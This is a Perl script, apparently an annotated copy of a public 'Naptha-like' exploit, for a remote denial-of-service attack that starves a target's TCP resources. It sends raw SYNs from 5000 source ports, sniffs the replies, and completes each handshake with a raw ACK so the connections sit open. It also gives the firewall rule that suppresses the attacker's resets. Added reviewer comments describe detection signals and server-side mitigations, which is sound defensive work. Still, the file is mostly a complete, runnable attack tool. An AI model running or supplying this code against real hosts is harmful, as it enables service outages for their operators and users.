#Remote DoS by TCP Resource Starvation - NMLabs
#Naptha-like
#Razor: Security Advisories and Publications
#http://razor.bindview.com/publish/advisories/adv_NAPTHA.html
#You need to configure your firewall so it does not send tcp reset.
#Example with ipf : block out proto tcp all flags R
#!/usr/bin/perl
#
# Reviewer notes (defender's view):
# - The script never opens a socket. It emits raw SYNs from a contiguous run
#   of 5000 source ports, sniffs the target's replies with pcap, and answers
#   each one with a raw ACK. The target therefore sees a completed handshake
#   and presumably keeps a connection open, while this host keeps no
#   per-connection state. No payload is ever sent on those connections.
# - Detection signal: a burst of SYNs from one source IP over consecutive
#   source ports to a single destination port, followed by established
#   connections that stay idle. Server-side mitigation is per-source
#   connection limits and short idle-connection timeouts; SYN cookies alone
#   are unlikely to help because the handshake is completed.
# - No `use strict`/`use warnings`: every variable is a package global.
#   `&usage()` and `new Net::RawIP` are legacy call forms.
use Net::RawIP qw(:pcap);
use Socket;

# Target address and port come from the command line; the argument count is
# only checked after both have been read.
$daddr=$ARGV[0];
$dport=$ARGV[1];
if($#ARGV != 1){
    &usage();
}

# Outgoing interface for the target, and the local address bound to it.
$dev=rdev($daddr);
$saddr=${ifaddrlist()}{$dev};

# pcap filter: any TCP segment from the target's address and port. It does
# not test TCP flags, so the callback sees every packet the target sends.
$rule="tcp and src host $daddr and src port $dport";

$sendpacket = new Net::RawIP;
$recvpacket = new Net::RawIP;
# snaplen 1500; the last argument is the pcap read timeout (units as defined
# by Net::RawIP, not shown here).
$pcap=$recvpacket->pcapinit($dev,$rule,1500,30);
$offset=linkoffset($pcap);

# Random start for the source-port run.
srand();
$startport=6666+int(rand(60000));

for($sport=$startport; $sport<($startport+5000); $sport++){
    # Raw SYN with a fixed initial sequence number.
    $sendpacket->set({
        ip=>{
            saddr=>$saddr,
            daddr=>$daddr,
        },
        tcp=>{
            source=>$sport,
            dest=>$dport,
            seq=>'-1184816751',
            ack_seq=>'0',
            urg=>'0',
            ack=>'0',
            psh=>'0',
            rst=>'0',
            syn=>'1',
            fin=>'0',
        }
    });
    $sendpacket->send();
    # Capture one packet matching $rule and hand it to sniffsynack;
    # @a is user data that the callback never reads.
    loop $pcap,1,\&sniffsynack,\@a;
}

# Print usage and exit.
sub usage {
    print "Usage: \$ perl naptha-like.pl ip port\n";
    exit;
}

# pcap callback: parse the captured segment and reply with the final ACK of
# the handshake. $_[2] is the raw frame; $offset skips the link-layer header.
sub sniffsynack {
    $recvpacket->bset(substr($_[2],$offset));
    # These lexicals shadow the globals of the same name ($saddr, $daddr,
    # $sport, $dport). Inside this sub they hold the captured packet's own
    # fields, i.e. "source" is the target and "dest" is this host.
    my ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr,
        $daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg,
        $ack,$psh,$rst,$syn,$fin,$win,$chk,$data) = $recvpacket->get({
            ip=>['version','ihl','tos','tot_len','id','frag_off',
                 'ttl','protocol','check','saddr','daddr'],
            tcp=>[ 'source','dest','seq','ack_seq','doff','res1',
                   'res2','urg','ack','psh','rst','syn','fin',
                   'window','check','data']
        });
    # A non-empty protocol field means a packet was actually parsed.
    if ($pro=~/\S/) {
        # Integer addresses to dotted quads; the ACK number acknowledges the
        # target's sequence number + 1.
        $saddr=inet_ntoa(pack("N",$saddr));
        $daddr=inet_ntoa(pack("N",$daddr));
        $seq++;
        # Swap the captured source/destination so the reply goes from this
        # host's address and port back to the target, ACK set, no SYN.
        $sendpacket->set({
            ip=>{
                saddr=>$daddr,
                daddr=>$saddr,
            },
            tcp=>{
                source=>$dport,
                dest=>$sport,
                seq=>$aseq,
                ack_seq=>$seq,
                urg=>'0',
                ack=>'1',
                psh=>'0',
                rst=>'0',
                syn=>'0',
                fin=>'0',
            }
        });
        $sendpacket->send();
    }
}